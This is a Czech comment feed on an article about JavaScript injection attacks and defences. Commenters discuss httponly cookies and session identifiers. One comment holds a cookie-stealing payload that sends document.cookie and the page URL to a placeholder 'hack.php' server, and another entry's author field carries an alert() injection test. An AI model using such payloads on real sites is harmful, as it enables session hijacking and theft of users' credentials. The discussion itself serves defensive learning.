Quantcast
Channel: Komentáře k příspěvku: Javascript Injection – způsoby útoku a obrana
Browsing all 8 articles
Browse latest View live

Od: .

... a nebo prostě cookie v javascriptu zakázat. document.cookie prostě nebude ani existovat. http://php.net/manual/en/function.setcookie.php

View Article



Od: Martin Kruliš

I když vypnete cookies, stále je tu problém, že se musí někde ukládat nějaký identifikátor relace. Aplikace to typicky řeší tak, že se začne sessionID předávat v URL, ke kterému má JS stejně snadný...

View Article

Od: .

Evidentně jsi nepochopil, co tím prvním příspěvkem bylo myšleno. Cookies budou zapnuté, jen nebudou přístupné přes JS. Přečti si to ještě jednou.

View Article

Od: Martin Kruliš

Aha. Teď už jsem vaši připomínku pochopil. Ano, to je také pěkný způsob prevence, pokud máte k dispozici PHP verze 5.2.0 a novější. Bohužel to ale nemusí podporovat všechny prohlížeče (httponly příznak...

View Article

Od: alert('Ahoj');//Pokud vidíte tento text, něco se nepovedlo.

Bezpečnost webových aplikací je velmi důležitá. Ve článku si ukážeme několik útoku typu Javascript Injection a vysvětlíme, jak se jim bránit.

View Article


Od: Marek

var url = "http://mujserver/hack.php?cookies=" + encodeURIComponent(document.cookie) + '&url=' + encodeURIComponent(location.href); location.replace(url);

View Article

Od: Martin Tauchman

Dobrý den. Měl bych jednu otázku ohledně bezpečnosti. Hledám to všude možně na netu a zatím bez úspěchu. Problém je tenhle: Dozvěděl jsem se, že JS funkce či ostatně všechny metody se dají spouštět...

View Article

Od: Jan Mikoláš

Dobrý den p. Martin Tauchman, zabýval jsem se v minulosti bezpečnosti webových aplikací. Nevím o tom, že pokud jsou vstupy správně ošetřeny a dbáte taktéž na HTML, že by se dal vůbec vykonávat nějaký...

View Article

Browsing all 8 articles
Browse latest View live